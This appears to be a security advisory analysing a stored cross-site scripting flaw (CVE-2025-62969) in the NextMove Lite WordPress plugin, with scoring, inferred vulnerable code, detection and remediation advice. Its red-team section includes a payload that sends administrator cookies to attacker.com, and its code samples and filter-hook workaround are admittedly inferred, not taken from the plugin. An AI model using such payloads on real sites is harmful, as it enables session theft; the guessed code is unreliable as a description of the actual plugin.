Executive Summary

CVE-2025-62969 is a Stored Cross-Site Scripting (XSS) vulnerability discovered in the WordPress plugin NextMove Lite (slug: woo-thank-you-page-nextmove-lite) by XLPlugins. This flaw allows an authenticated attacker with contributor-level privileges or higher to inject arbitrary web scripts into the plugin’s pages. When a site administrator or other user views the compromised page, the injected script executes in their browser, potentially leading to session hijacking, credential theft, or defacement. The vulnerability affects all versions up to and including 2.23.0. No official patch has been released at the time of analysis.

Supply Chain & Package Security

This vulnerability resides in a WordPress plugin distributed via the official WordPress plugin repository. The plugin is not an NPM, PyPI, Go, or Ruby package, but it is part of the WordPress ecosystem supply chain. Users who install or update the plugin from the WordPress dashboard or via wp-cli are at risk. The lack of a patch means that the plugin’s supply chain integrity is compromised until a fix is released.

CVSS Breakdown & Threat Level

  • CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
  • Base Score: 6.5 (Medium)
  • Attack Vector: Network (AV:N)
  • Attack Complexity: Low (AC:L)
  • Privileges Required: Low (PR:L) – requires an authenticated user with at least Contributor role.
  • User Interaction: Required (UI:R) – the victim must visit the affected page.
  • Scope: Changed (S:C) – the vulnerability can impact resources beyond the vulnerable component.
  • Confidentiality Impact: Low (C:L)
  • Integrity Impact: Low (I:L)
  • Availability Impact: Low (A:L)

Threat Level: Medium. While the CVSS score is 6.5, the requirement for authenticated access and user interaction reduces the immediate risk. However, in a WordPress multisite or shared hosting environment, a contributor-level user can compromise the entire site’s security.

Deep Dive & Mechanics

The vulnerability stems from improper neutralization of user-supplied input during web page generation. The NextMove Lite plugin likely fails to sanitize or escape data stored in custom fields, order metadata, or thank-you page content before rendering it in the browser. An attacker with contributor-level access can inject malicious JavaScript into fields such as:

  • Custom order notes
  • Thank-you page custom messages
  • Product or order meta fields

When the thank-you page is rendered for a subsequent visitor (e.g., an administrator reviewing orders), the injected script executes. The stored XSS persists across sessions, making it a persistent threat.

Root Cause: The plugin uses echo or print statements without proper escaping functions like esc_html(), esc_attr(), or wp_kses_post().

Vulnerable vs. Patched Code

Since no patch is available, the vulnerable code pattern is inferred. A typical vulnerable snippet in a WordPress plugin might look like:

// Vulnerable code (NextMove Lite <= 2.23.0)
echo "<div class='thank-you-message'>" . $custom_message . "</div>";

The patched version should use WordPress escaping:

// Patched code (hypothetical)
echo "<div class='thank-you-message'>" . esc_html( $custom_message ) . "</div>";

The esc_html() function converts special characters to HTML entities, preventing script injection.

Exploitation & Lab Setup

Red Team (Exploitation)

Prerequisites:

  • A WordPress site with NextMove Lite <= 2.23.0 installed and activated.
  • An authenticated user account with at least Contributor role.

Steps:

  1. Log in as a Contributor.
  2. Navigate to a page where custom input is stored (e.g., WooCommerce order notes or plugin settings).
  3. Inject the following payload into a text field:
    <script>alert('XSS')</script>

  4. Save the changes.
  5. As an administrator, view the thank-you page or order details. The script executes.

Advanced Payload (Session Hijacking):

<script>
fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>

Blue Team (Detection & Hardening)

Detection:

  • Monitor for unusual JavaScript in custom fields or order notes.
  • Use a Web Application Firewall (WAF) with XSS signatures.
  • Review server logs for alert() or fetch() calls in POST data.

Hardening:

  • Disable the plugin until a patch is released.
  • Restrict Contributor roles from editing sensitive fields.
  • Implement Content Security Policy (CSP) headers to block inline scripts.

Indicators of Compromise (IOCs)

  • File Hashes (SHA256): (None available – plugin files are not signed)
  • Network Indicators:
    • Outbound HTTP requests to attacker-controlled domains from the WordPress admin.
    • POST requests containing <script> tags to /wp-admin/admin-ajax.php or plugin-specific endpoints.
  • Log Entries:
    • wp-content/plugins/woo-thank-you-page-nextmove-lite/ directory modifications.
    • Database entries in wp_postmeta or wp_options containing JavaScript.
  • Behavioral:
    • Unexpected pop-ups or redirects on thank-you pages.
    • Administrator session cookies being exfiltrated.

Remediation & Mitigation

Immediate Actions:

  1. Disable the plugin until a patched version is released.
  2. Audit user roles – remove Contributor access from untrusted users.
  3. Scan the database for stored XSS payloads using a security plugin like Wordfence.

Long-Term Fix:

  • The vendor must release a patched version (e.g., 2.23.1) that properly escapes all output using esc_html(), esc_attr(), or wp_kses_post().
  • Implement a Web Application Firewall (WAF) rule to block <script> tags in POST data.

Workaround:

  • Add the following code to the theme’s functions.php to sanitize output:
    add_filter( 'nextmove_lite_custom_message', 'esc_html' );
